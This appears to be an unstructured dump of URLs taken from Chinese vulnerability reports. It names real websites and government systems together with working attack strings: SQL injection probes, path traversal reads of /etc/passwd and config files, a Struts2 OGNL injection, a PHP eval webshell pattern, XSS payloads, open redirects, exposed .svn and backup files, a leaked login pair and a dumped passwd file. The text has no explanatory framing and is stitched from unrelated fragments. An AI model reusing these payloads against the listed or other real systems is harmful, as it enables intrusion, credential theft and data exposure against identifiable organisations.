http://域名/member/Register.asp http://fan.yoka.com/test1.php这里有个phpinfo http://www.ccard.org.cn/存在3个注入点。 http://www.ccard.org.cn/login.aspx,注入点:tb1 http://www.ccard.org.cn/login.aspx,注入点:tb2 http://www.ccard.org.cn/reg.aspx,注入点:tb1 https://www.qiban365.com/zuhu/getpassword/Com_getPwd1.do http://www.capitalonline.net.cn/index.php/aboutus/index/id/8.html http://www.capitalonline.net.cn/index.php/aboutus/index/id/8*.html http://data.bank.hexun.com/card/xykcenter.aspx?no=1 http://data.bank.hexun.com/card/xykcenter.aspx?no=1 http://2012.moban.siteserver.cn/siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1'%20and%201=@@version%20and%201='1 http://wx.house365.com/admin/admincp/vote/adminvote.php?read= http://2012.moban.siteserver.cn/siteserver/UserRole/background_userAdd.aspx?UserName=yjfjnpuc'%20and%201=@@version%20and%201='1&ReturnUrl=../cms/console_user.aspx http://wx.house365.com/snhome/main.php?do=info http://2012.moban.siteserver.cn/siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%201=@@version%20and%201='1 http://opac.jxlib.gov.cn/NTRdrBookRetrInfo.aspx?BookRecno=432145 http://hf.house365.com/admin/admincp/vote/adminvote.php?read=412 http://mall.heilanhome.com/?is_ajax&app_act=goods/comment&app_page=../../../../../../../../../../etc/passwd&goods_sn=HZSD4B031 http://www.jxsafety.gov.cn/templates/government/feedback/webzxlist.aspx?date1= http://ht.52xinyou.cn/ http://112.124.*.*/img.php?id=wxkj&c=3 http://121.199.*.*/js/v88/index.js http://movie.douban.com/subject/3804891/questions/155/ http://www.social-touch.com/ApplicationApply/AjaxGet_city http://www.social-touch.com/ApplicationApply/AjaxGet_city http://www.guobin.net/xxx/xxxxx.pdf http://www.guobin.net/xxx/ http://www.guobin.net/UpFiles/pdf/ http://hotel.heilan.com.cn/ http://hotel.heilan.com.cn/archives/detail.php?id=ylxx http://hotel.heilan.com.cn/install/ http://hotel.heilan.com.cn/ogilvy_sys/login.php# http://www.mosh.cn/about/?id=8 http://www.mosh.cn/about/?id=8 http://order.gmacsaic.net/index.jsp http://t.atlenovo.com/php.php http://street.atlenovo.com/guest/addAllFriend.php http://ce.atlenovo.com/products_last.php?id=60 street.atlenovo.com/guest/feedbackdo.php http://www.tyresort.com/hr/jobs.html http://xy006.52xinyou.cn/api/remote/login.ashx?cid=0.3394278590029699&callback=jsonp1389690871382&uid=test%27&pwd=adfadsf&rem=false http://xy006.52xinyou.cn/api/remote/login.ashx?cid=0.3394278590029699&callback=jsonp1389690871382&uid=test&pwd=adfadsf&rem=false http://v.yonyou.com/uc_server/ http://crew.juneyaoair.com http://crew.juneyaoair.com/flight_vip_info.jsp?flightdate=2013/10/17&flightno=HO1287&departport=ZSSS&destport=ZGGG http://wsyc.lqwang.com http://www.jxyxfda.gov.cn/info.asp?ID=326 http://www.jxyxfda.gov.cn/banshi.asp?page=1&id=4 http://www.wxgtzyj.gov.cn/guanli/login.asp http://www.tizistar.com/ http://hotel.heilan.com.cn/ http://tool.114la.com http://tool.114la.com/?ac=wapview_api&ct=site&Data=&Method=get&URL=../../../../../../../../../../etc/hosts http://tool.114la.com/?ac=wapview_api&ct=site&Data=&Method=get&URL=../../../../../../../../../../etc/group http://tool.114la.com/?ac=wapview_api&ct=site&Data=&Method=get&URL=../../../../../../../../../../etc/resolv.conf http://tool.114la.com/?ac=wapview_api&ct=site&Data=&Method=get&URL=../../../../../../../../../../etc/passwd http://www.baidu.com/s?wd=inurl%3Atype.do%3Ftid%3D url:http://www.allyes.com/index.php/Service/index/id/8.html http://www.allyes.com/index.php/Service/index/id/8*.html http://www.allyes.com/admin.php http://www.pziad.com/cx/cxa300-250.php?id=966 http://ht.52xinyou.cn/xykj/login.aspx http://ht.52xinyou.cn/xykj/login.aspx www.yiban.cn http://www.aosclub.com/discuz/forum.php http://www.discuz.net/thread-2696203-1-1.html http://drops.wooyun.org/papers/548 http://www.hapa.gov.cn/ http://sz.focus.cn/common/group/hdzdy/hd_fenlei.php?lx=jdtj http://tuan.joyoung.com的安全。 http://tuan.joyoung.com url-http://testdb.39.net/ http://wizard.stock.hexun.com/zlkpf/more.aspx?canshu=34 http://gr.xidian.edu.cn/paginationAction.do?id_xxnr=18 http://academy.yonyou.com http://academy.yonyou.com/StaffHome/ViewMapZsPage.aspx?order=z_products&isget=all&name= http://506srm.cofco.com/custom/GroupNewsList.aspx?GroupId=157 http://en.hundsun.com/zhaopin/selectPosition.do http://www.hundsun.com/zhaopin/selectPosition.do http://www.hundsun.com/wooyun.txt http://dream.yiban.cn/schoolvideo.php?id=36 http://219.146.13.148:8080/ http://116.113.105.165:8002/yydj/jhyy-ok.asp?AIAID=1135 http://mm.5see.com/ http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab#version=8,0,0,0 clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 http://edu.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf http://11.com/1.wma|bbbbbbb|0|aaaaaa|0 http://edu.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf http://edu.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf http://xsst.sinaapp.com/Xss.swf http://xsst.sinaapp.com/Xss.swf http://r.hexun.com/ql.php?reporttime=7 http://r.hexun.com/ql.php?reporttime=7 http://r.hexun.com/ql.php?reporttime=7 https://passport.baidu.com/?getpassindex&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2F,完全没问题啊,扫一下二维码直接重置。 http://game.25pp.com/ http://www.jincheng18.com/userLogin_hasLogin.action http://www.jincheng18.com/userLogin_hasLogin.action http://app.sdcp.cn/fccms/ mail:cecs@mail.cin.gov.cn http://www.cecs.org.cn/ http://www.cecs.org.cn//Script/Script.js http://hd.baofeng.com/go/aHmDz22.html(太奇怪了,这明明是暴风影音的域名啊) http://www.amazon.cn/?tag=nd220031-23 http://www.amazon.cn/ref=z_cn?tag=zcn0e-23。 http://219.146.13.105:8099/school/loginAction.do http://219.146.13.105:8099/ http://sports.m.letv.com/sports/originalColumn/list http://sports.m.letv.com/sports/originalVideo/list?columnId=1 http://passport.kongzhong.com/pwdback/pwdmobileback/pwdback_mobile http://www.tt-xx.com/ http://hbj.serc.gov.cn/ywdd.jsp?id1=0001&id2=&id3=&id4=&content=%D2%AA%CE%C5%B5%BC%B6%C1 http://222.216.29.34/ http://www.zzmetro.cn/index.html http://www.zzmetro.cn/adminindex.jsp http://partner.yonyou.com/Channel/Channel/ http://ht.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy001.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy002.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy003.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy004.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy005.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy006.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://ui.letv.com/ http://ui.letv.com/uc_server http://wzxmt.want-want.com/ http://mail.yinqiaogroup.com/webmail/userapply.php?execadd=333&DomainID=111 http://u8dev.yonyou.com/ http://u8dev.yonyou.com/home/blog/index.aspx?r=all&key=0&text_key=1 http://www.yiban.cn/webim/.svn/entries站点的svn侧漏,下载下来部分源码 http://www.zznx.com.cn/ http://sms.cnpostair.com/login.jsp http://www.jianshe.com.cn/CommonFile/Cx_DynamicInfo.aspx?kindName=创新技术&secondId=1033&thirdID=&Description=产品研发&ShowTypeId=156 http://www.eset.com.cn/share/getLang.php http://www.eset.com.cn/share/getLang.php https://uhost.ucloud.cn/bandwidth/create_shared_bandwidth_package http://zhaopin.hi.chinamobile.com/hr/recruit/candidate_portal_info.ac?candidateId=12345&print=true http://zhaopin.hi.chinamobile.com/hr/recruit/candidate_portal_info.ac?candidateId=12345&print=true http://zhaopin.hi.chinamobile.com/hr/recruit/candidate_portal_info.ac?candidateId=12345&print=flase http://www.csbidding.com/nhzb/login2.jsp http://www.csbidding.com/nhzb/login3.jsp http://www.csbidding.com/nhzb/login4.jsp http://beian.cndns.com http://beian.cndns.com/icpadmin.php?module=admin_icp_hshow&id=473953 http://beian.shopex.cn/ http://beian.cndns.com/ http://icp.gwbnsh.net.cn/ http://beian.ocn.net.cn/ http://bbs.aili.com/home-space-uid-1051999-do-profile-view-me.html http://202.108.16.139/ http://data.futures.hexun.com.tw/ccjg.aspx?page=2&sBreed=10301010000&sCompanyID=154&sDate=2014-01-10 http://data.futures.hexun.com.tw/dpic/drawccjj.ashx?sBreed=10301010000&sCompanyID=154&sContract=A1405&sCyc=1 http://data.futures.hexun.com.tw/dpic/drawjcgc.ashx?sBreed=10301010000&sCompanyID=154&sContract=A1405&sCyc=1 http://data.futures.hexun.com.tw/jcgc.aspx?page=1&sBreed=10301010000&sCompanyID=154&sContract=A1405&sCyc=1 http://data.futures.hexun.com.tw/ykfx.aspx?scompanyid=154&scontract=A1405 http://yueyu.kuaiapp.cn/lists.php?newsid=80 http://yueyu.kuaiapp.cn/lists.php?newsid=80 http://202.108.16.132/qrcode/list.action http://202.108.16.139/redirect.action?id=1 http://202.108.16.194/ http://202.108.16.194/cntv_news/index.php http://gp.people.com.cn/yangshuo/skygb/sk/index.php/Index/login http://selfservice.ikuai8.com/ http://125.88.6.155/coms/login.jsp报关管理系统漏洞来 http://125.88.6.155/coms/updatepword.jsp?username=123&oldpasswd=123&newpasswd=123&snewpasswd=123 http://www.qycn.com/ajax.request.php url:http://ebusiness.minshenglife.com:8001/mssug/indexlis.jsp http://www.91job.gov.cn:2008/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://www.fckeditor.net http://www.tclbusiness.com/ http://dg.tgbus.com/Search.aspx?app=1&extname=&flag=0&isid=0&keyword=&page=3&productid=0&typeid=0 http://www.libsys.com.cn/downloadmore.php?pid=libsys5.0new http://hndczx.mep.gov.cn/mo/list.jsp?key=hbyq&page=1 http://www.jshp.com.cn/xwbf.php?path=999999 http://www.eset.com.cn/news.php http://www.wuliangye.com.cn/download.xml?id=28&path=../../../../../../../../../../etc/passwd%00 www.wochacha.com/news_read_c_3_id_343.html www.wochacha.com/news_read_c_3 www.wochacha.com/news_read_c_3 http://m.koyimall.com/?act=shop.goods_list&GC=GD00&ST=SCODE1 http://m.koyimall.com/?act=board.board_view&bbs_seq=100 http://m.koyimall.com/?act=shop.goods_view&GS=63611%20and%201=2 http://user.tgbus.com页面随便注册一个账号 http://e-learn.airchina.com.cn http://51.eset.com.cn/ index.php/user/lookpwd http://51.eset.com.cn/ http://60.13.122.83:8080/ http://f.game.tom.com/admin.php?mod=phpcms&file=index&action=index www.eset.com.cn http://pc.51zhangdan.com/service/log4net.xml http://pc.51zhangdan.com/service/ http://pc.51zhangdan.com/assets/ http://pc.51zhangdan.com/service/log/ http://pc.51zhangdan.com/service/%E5%A4%8D%E4%BB%B6%20%284%29%20bin/log4net.xml http://pc.51zhangdan.com/service/%E5%A4%8D%E4%BB%B6%20%284%29%20bin/MongoDB.Bson.xml http://pc.51zhangdan.com/service/%E5%A4%8D%E4%BB%B6%20%284%29%20bin/MongoDB.Driver.xml http://www.l000s.com http://www.l000s.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/aspx/connector.aspx www.shehr.cn http://www.shehr.cn/office/guestbook.php www.shehr.cn http://www.sogou.com/complain/complaint.php?type=3 www.sogou.com http://www.wuxia.renren.com/ http://www.wuxia.renren.com/ www.wuxia.renren.com www.kuaidadi.com http://xxx/admin_login.php登陆 http://xxx/admin/index.php即可进入后台 http://www.skyclass.net/ http://www.liufeng888.cn/ http://dx.skyclass.net/ http://61.138.252.201/ http://61.128.110.144/ http://61.128.122.136/ http://124.117.243.78/ http://202.117.16.193/ http://www.xjcxedu.cn/ http://www.skyclass.net/news.php?sid=4 http://124.117.225.166/eis/index.action www.wooyun.org/bugs/wooyun-2010-02480的后面操作是一样的 course.buct.edu.cn/homepage/common/opencourse/ http://www.nsii.org.cn/e_inscode_dist.php?id=5 http://home.mama.cn/index.php?a=Pic&d=index&g=Gallery&rtypeid=1 inurl:life/jiufang http://www.xxxxx.com/tools/life/jiufang/index.php?q={${phpinfo%28%29 http://www.xxxxx.com/tools/life/jiufang/index.php?q={${eval%28$_POST[k]%29 http://shop.gz163.cn/kuandai.php?act=post_order http://yxt.gz163.cn/ http://221.176.65.1 http://221.176.65.3/ http://221.176.65.3/登录位置,可以看到部分的员工登录信息,隶属移动的旗下单位,以及一些合作商的信息,看后台源代码。没找到更多的信息,后来, http://221.176.65.3/Org/MoreLoginUserList.aspx?UserType=si http://221.176.65.3/login/LoginDetails.aspx?UserID=b26da40d26bf4e27941ad7706832d097 http://192.168.1.1/GateWay/RosApi.asmx http://192.168.1.1/GateWay/RosApi.asmx?op=CheckLoginUser http://192.168.1.1/GateWay/RosApi.asmx?op=SetUserOffLine data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+ http://www.jxdcn.gov.cn/page_notice.asp?classname=公告&id=2216 http://www.jxdcn.gov.cn/page_netschool.asp?classname=种植技术&id=749 http://www.jxdcn.gov.cn/readbook.asp?id=940 http://www.jxdcn.gov.cn/lecture_video.asp?id=296 http://www.jxdcn.gov.cn/page_content.asp?classname=县中心动态&id=1968 http://www.jxdcn.gov.cn/readbook.asp?id=940 http://www.ynwh.net/bolanhui.jsp?id=109 http://www.doov.com.cn/tbw68.php http://www.doov.com.cn/qin.txt http://www.cngrid.org/jeeadmin/jeecms/index.do ftp://221.15.*.*/ http://61.168.11.30:8011/new_mss/ http://ha.mail.chinaunicom.cn/ https://www.mii-aqfh.cn/ name:cu_h pw:ptNGphd2 http://61.168.11.30:8011/new_mss/ http://www.iheilan.com/ http://cee.gov.cn/admin/main.html http://brandbase.mama.cn/zhangguang.php?mod=yuyue&op=main&province=19&type=getcitys http://wooyun.org/bugs/wooyun-2013-044362 http://www.zte-d.com/upload/techinfo/20140118_9fc3d7152ba9336a670e36d0ed79bc43.php http://www.kfcz.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=../../..&Connector=connectors/jsp/connector http://www.kfcz.gov.cn/userSites/kfcz/inc/left.jsp http://fy.hnsfj.gov.cn/Login.action http://www.gs.10086.cn/service/obsh.html#GPRSTC http://wap.gs.10086.cn/page.do?page=CX_ZYYW&busiNum=CX_ZYYW&reqHandle=queryHandle http://so.liuzhou.gov.cn:8080/inforadar/jsp/file/file_download.jsp?fileType=file&fileName=../../file/file_download.jsp http://ued.huatu.com http://ued.huatu.com/?author=2 www.thyuwen.com www.51taoshi.com www.51taoshi.cn TOP2:51taoshi.com旁站struts2 hbjjxt.e21.cn/loadLogin.action?redirect:http://www.yahoo.com/ http://hbjjxt.e21.cn/loadLogin.action http://lib.bit.edu.cn https://viaforensics.com/mobile-security/chained-vulnerabilities-firefox-android-pimp-browser.html http://www.pigai.org/index.php?c=v2&a=write&rid=307629&eid= http://www.pigai.org/index.php?c=v2&a=write&rid=200052&eid= http://www.pigai.org/index.php?c=v2&a=write&rid=222777&eid= http://www.pigai.org/index.php?c=v2&a=write&rid=298434&eid= http://www.osmun.com.cn/admin/upload.aspx http://mail.72e.net:88//upload/message/72e.net/20130121/fix.php http://mail.72e.net:88//upload/attach/szzoo.net/zmh/2013092617261562693_138022563_eml/1/2013092617261562693_138022563_eml_1.html http://mail.72e.net:88/login.php?lang=../config/config_inc http://mail.72e.net:88/login.php?lang=../config/config.inc http://www.jxbys.net.cn/zscx/cxbdzqk.asp www.jxbys.net.cn http://cos.sto.cn/docs/DocBrowserMain.jsp?url=/page/maint/common/UserResourceBrowse.jsp?file=none http://cos.sto.cn//js/swfupload/ http://cos.sto.cn/page/resource/userfile/image/top001.jsp http://legend.7daysinn.cn/Login.aspx http://mt.7daysinn.cn/EditProblemInfo.aspx?Operate=2&InfoID=128971 http://news.baidu.com/cache_ns?&from=news&cl=2&rn=20&ct=1&tn=json&ie=utf-8&x=callback&word=1 http://www.jjwxc.net/comment.php?allstr=&kstr=a&orderstr=1&tj=0 line:580 http://www.shandong.gov.cn/module/jslib/jquery/jpage/dataproxy.jsp?endrecord=20&perpage=20&startrecord=1 http://news.163.com/11/0329/14/70APFMN400014AEE.html http://news.163.com/12/0604/18/8366392700014AEE.html http://www.chengduair.cc/news2011/newsdate.asp?id=295 http://www.chengduair.cc/news2011/newsdate.asp?id=293 http://www.chengduair.cc/news2011/newsdate.asp?id=294 http://www.chengduair.cc/news2011/newsdate.asp?id=292 http://61.139.73.103/system/uploadFiles.do?operate=fileDownload_is&filepath= http://61.139.73.103/usertree.do?operate=selectDeptTree&time= http://218.106.133.54/ http://www.xmb.com.cn/ http://manager.zt-express.com/PageViews/Login/Login.aspx http://www.zt-express.com/ http://bb.zt-express.com/ http://cx.zt-express.com/ http://crm.zt-express.com/ http://www.wissun.com/index.php?do=news&act=list&pid=411 http://www.wissun.com/index.php?do=news&act=list&pid=411 http://bbs.wwtx.cn/ http://bbs.wwtx.cn/uc_server/data/config.inc.php.bak http://www.wandaperformance.com/ http://www.wandaperformance.com/FileUpload http://www.gzjtw.com.cn/jobview.php?id=164%E2%80%98 http://web.10050.net/ http://www.jiakaobaodian.com/ http://www.anta.cn/ http://www.365hrm.com:8080/365hrm/configuration/dologin_single.action http://bjtzyw.gov.cn/ http://demo.zoomla.cn/ http://www.jiankongbao.com/content/edit/XXX http://wh.i3v.cc/采用dedecms5.7,存在变量覆盖漏洞 http://www.58888222.com/ http://wooyun.org/bugs/wooyun-2010-04214 http://video.sina.com.cn/haokan/play.html?url=expla.fhrfitness.com/107/xianzhi http://i.178.com http://wap.17wo.cn/这个网站可以进行密码重置 http://gz.ip66.com/wap/datalist.php http://www.cqpost.com/siteserver/Installer/default.aspx http://www.fhplan.gov.cn/siteserver/Installer/default.aspx http://www.hfxzzx.gov.cn/sscms/siteserver/Installer/default.aspx http://www.wnmc.edu.cn/siteserver/Installer/Default.aspx http://www.ahlxcdc.com/siteserver/Installer/Access.aspx http://nanolab.pku.edu.cn/siteserver/Installer/default.aspx http://www.qfnujiuye.com/siteserver/Installer/default.aspx http://fzxy.sdut.edu.cn/siteserver/Installer/Default.aspx http://www.bmi.ac.cn/siteserver/Installer/default.aspx http://www.zjer.cn/channel/index/ http://jiufang.zdomo.com/ https://xx.xx.xx.x/vpnweb/bulletin.php?para=admin/index.php绕过认证直接访问后台认证,使用burp抓包,得到url地址 https://xxx.xx.xx.xx//admin/device_status.php http://mama.91.com/)合存在SQL注入漏洞 http://mama.91.com:80/DIYApp/diyDetail?id= http://mama.91.com:80/DIYApp/diyDetail?id=* http://www.dayrui.net/fang/index.php http://www.dayrui.net/fang/index.php?c=search&area=2395&catid=1&order=updatetime http://www.dayrui.net/fang/index.php?c=search&area=2395&zujin=0%2C500&catid=1 http://www.dayrui.net/fang/index.php?c=search&area=2395&catid=1 http://www.dayrui.net/fang/index.php?c=search&catid=1 http://www.dayrui.net/video/index.php http://www.dayrui.net/video/index.php?c=search&catid=1&order=updatetime http://www.dayrui.net/video/index.php?c=search&area=%E5%A4%A7%E9%99%86&catid=1 http://www.dayrui.net/video/index.php?c=search&catid=7 http://www.dayrui.net/space/index.php http://www.dayrui.net/space/index.php?order=displayorder http://www.dayrui.net/space/index.php?keyword=finecms&order=displayorder http://x.x.x.x/seeyon/management/status.jsp http://x.x.x.x/seeyon/main.do?method=officeDown&filename=c:/boot.ini http://122.156.217.45:8080/seeyon/main.do?method=officeDown&filename=D:/UFSeeyon/A8/Group/ApacheJetspeed/conf/tomcat-users.xml http://x.x.x.x/manager/html http://web.hangzhou.com.cn/money/ http://wizard.stock.hexun.com/zlkpf/photo.aspx?fld_id=8 http://www.sdo.com/common/RedirectAppSite?url=http%3A%2F%2Fkf.sdo.com%2Fsdch%2Findex.asp&name=%E5%AE%A2%E6%9C%8D%E4%B8%AD%E5%BF%83 http://www.sdo.com/common/RedirectAppSite?url=http%3A%2F%2Fwww.snda.com%2F&name=%E5%85%B3%E4%BA%8E%E7%9B%9B%E5%A4%A7%E9%9B%86%E5%9B%A2 http://www.sdo.com/common/RedirectAppSite?url=http%3A%2F%2Fhr.snda.com%2F&name=%E7%9B%9B%E5%A4%A7%E6%8B%9B%E8%81%98 http://www.sdo.com/common/RedirectAppSite?url=http%3A%2F%2Fgmm.sdo.com&name=G%E4%B9%B0%E5%8D%96 http://www.sdo.com/common/RedirectAppSite?url=http%3A%2F%2Fwww.yuncheng.com%2Fbb&name=%E7%9B%9B%E5%A4%A7%E7%94%B5%E5%AD%90%E4%B9%A6 http://ipic.staticsdo.com/external/install_beacon.js http://caipiao.tenpay.com/v1.0/bc.shtml?url=@www.baidu.com http://www.jiankongbao.com/adv_compare.php?crt_id=320&type=comparison http://www.jiankongbao.com/adv_compare.php?crt_id=321&type=comparison http://www.jiankongbao.com/adv_compare.php?crt_id=322&type=comparison http://www.jiankongbao.com/adv_compare.php?crt_id=323&type=comparison http://111.13.51.105:8080/ http://www.spider.com.cn/userJquery.action http://www.tygjj.com/ http://www.csair.com/cn/index.shtml,然后点击服务大厅,接下来点击座位预留下面的查看详情如图 http://218.106.133.143/wms/login.asp http://218.106.133.143/searchorder.asp?page=13&state=2 http://www.jiankongbao.com/maintain/create/XXX http://www.jiankongbao.com/maintain/create/190 http://www.jiankongbao.com/maintain/create/189 http://mis.xinhuanet.com/edz/login.asp http://113.140.70.184:4016/forUI/Policy/showPolicy.aspx?ID=1415376c-e846-412f-b719-ceb1f03fd97f http://wish.home.news.cn//index.php?m=search&c=index&a=public_get_suggest_keyword&url=test&q=../../../../etc/passwd http://manage.baison.com.cn:8001/manage/Default.htm https://vpn.cugb.edu.cn http://wd.koudai.com/vshop/1/H5/H5GetCommonItems.php?userid=1 http://shop.wwtx.cn/goods/56 http://bbs.67.com/uc_server http://211.67.48.102/common/BillBack.sh文件,可得数据库配置文件。 http://183.129.178.139:8100/justests/JFolder.jsp http://www.purchase.gov.cn/ http://agent.soufun.com/ForgetPassword.aspx http://www.jxjsjy.com/search/ www.jxjsjy.com http://www.jxjsjy.com http://www.jingwei.com/follow/followuser?uid= http://www.jingwei.com/follow/followuser?uid=7594985 http://www.swmc.org.cn/admin/login.jsp www.gc437.com.cn site:gc437.com.cn.出现“安全联盟提醒您:该页面可能已被非法篡改!” http://www.gc437.com.cn/1.asp http://www.gc437.com.cn/2.asp http://118.114.246.49/admin_set.asp http://www.gc436.com.cn http://teachingdata.com/Admin/ http://video.sina.com.cn/haokan/play.html?url=baidu.com https://file.suibiji.com/att?src=../etc/passwd注册一个号~任意读取文件~~ http://t.sohu.com http://dp.sina.cn/dpool/hdpic/eladies/index.php?ch=3&cid=1&clicktime=1390236749255%3C/script%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E&userid=user13902367492553233335653785616 http://my.gaofen.com/signup/checkUser?type=2&username=admin http://my.gaofen.com/signup/checkUser?type=2&username=admin http://my.gaofen.com/signup/checkUser?type=2&username=admin http://shishi.gaofen.com/?mod=all http://haoma.sogou.com/appeal.html http://haoma.sogou.com http://glxy.mot.gov.cn/BM/index.html http://glxy.mot.gov.cn/BM/CreditAction_corpList.do?corpcode=71752305-2 http://www.sdo.com/go http://www.sdo.com/go#http://www.wooyun.org?sdo.com site:zt-express.com http://kdweibo.com/home http://syxy.mot.gov.cn/credit/index.jsp http://218.29.139.87/index.php http://218.29.139.87:8089/swordfish/wbs/siteDispatherUI!viewRegPerson.action?id=12 http://221.213.44.146:9000/Default.aspx http://221.213.44.146:9000/FrmInfoDetail.aspx?Type=ZRZTSGDW&Code=fd5018bc-36d7-49da-b6fa-aaad159b3fba&IsShow=1&SubType=003 http://218.26.163.59:8088/sxztb/ http://218.26.163.59:8088/sxztb/xxfbQueList.action?sy=y&type=12cedc829f91b7516d0000000 http://zhidao.baidu.com/question/80878155.html?qbl=relate_question_3 http://kuaidadi.com/phone/ http://wc.7daysinn.cn:8080/login http://ad.hangzhou.com.cn/admin.asp http://mrp5.7daysinn.cn/PUR101A.Web/Forms/SelectArticleKind.aspx?Name=txtVendorName&TypeId=1%2c3&popup=1&tmp=48 http://jnjpfw.miit.gov.cn/ http://jnjpfw.miit.gov.cn:8080/industryportal/trees/TecInfo.aspx?appid=010f9caf-3cea-4b21-b09a-5bd3aa1c36dd http://inner.7daysinn.cn/FindHotel/Default.aspx https://shenghuo.alipay.com/peerpaycore/tradePeerPayApply.htm?tradeNoList=2014012011001001680018854252 https://shenghuo.alipay.com/peerpaycore/tradePeerPayApply.htm?tradeNoList=2014012011001001680018854255 https://shenghuo.alipay.com/peerpaycore/tradePeerPayApply.htm?tradeNoList=2014012011001001680018854259 http://desk.oa.91.com/login/try?code=tfjt http://biye.jlu.edu.cn/?mod=info&act=view&id=24-1 http://shop.wwtx.cn/index.php?act=views&app=store&id=656864&sid=170 http://womenslife.dahe.cn/ http://ets-ccaa.open.com.cn/login.aspx http://www.025.com:8010/025admin/UserSuggest/BugPost.aspx?id=1 http://t.xcb.sdo.com/admincp/RecommendUsers.aspx http://218.108.73.82/index.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.183gz.com.cn/company/zhw/CONN.ASP http://www.183gz.com.cn/company/zhw/Data/MeQskdyDMS_4DaJta.mdb http://yt.linekong.com/special/newbook/.svn/entries http://yt.linekong.com/lottery/.svn/entries http://xy.linekong.com/special/matrix/.svn/entries http://yt2.linekong.com/activity/activation/.svn/entries http://eeye.online.tj.cn/bbonline/zh_cn/genearch/NoticeCenterContent.asp?notice_did=1 http://eeye.online.tj.cn/ http://cloud.189.cn/ http://cloud.189.cn/t/qY3MJzvaaqmm http://write.blog.csdn.net/postlist?t=del&id=这里就是文章的Id http://blog.csdn.net/u013546030/article/details/18705767 http://www.114otc.com/userlist.aspx clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab#version=8,0,0,0 http://stream9.qqmusic.qq.com/12729312.wma|Postcard http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf"/ http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf"/ clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab#version=8,0,0,0 http://xsst.sinaapp.com/Xss.swf http://stream9.qqmusic.qq.com/12729312.wma|Postcard http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf"/ http://ctc.qzs.qq.com/music/musicbox_v2_1/img/MusicFlash.swf"/ http://xsst.sinaapp.com/Xss.swf index.php/storeHome/axisRight http://www.sdrkjsw.gov.cn/nshow/14257.html http://124.133.3.231:8001/ http://www1.gome.com.cn/这个子域名。 http://www1.gome.com.cn/upload/db.zip http://fj.shenghuoquan.cn/ http://ftp.baison.net:5000/ http://www.sysgsj.gov.cn/xzgg_view.php?act=%B9%AB%B8%E6%B9%AB%CA%BE&id=456 http://www.tcl.com/.svn/entries http://multimedia.tcl.com/en/home/.svn/entries http://bs.center.aoshitang.com/usercenter/userCenter/userManager.action root:x:0:0:root:/root:/bin/rzsh bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin mail:x:8:12:mail:/var/spool/mail:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin astd:x:500:500::/home/astd:/bin/rzsh mysql:x:501:501::/home/mysql:/bin/rzsh zabbix:x:502:502::/home/zabbix:/bin/false rd:x:503:503::/home/rd:/bin/rzsh agent:x:505:505::/home/agent:/bin/rzsh http://218.242.57.204:20000/ http://211.103.156.32:8021/ http://www.whctp.gov.cn/gqxwco.action?id=20486 http://www.whctp.gov.cn/sec.jsp http://dp.ha.xinhuanet.com/MessageManager/NewMessageShow.aspx?messageID=173 http://ss.linekong.com/article.php?article_id=39&sort_id=44 http://www.lenovostoreapp.com/admin/index.php/3c/sign http://test.pclady.com.cn/.svn/entries http://www.bjsubway.com/e/action/ListInfo/?classid=40&ph=1&station=苹果园 http://hd.kdzz.kongzhong.com/rank/pclogin.php 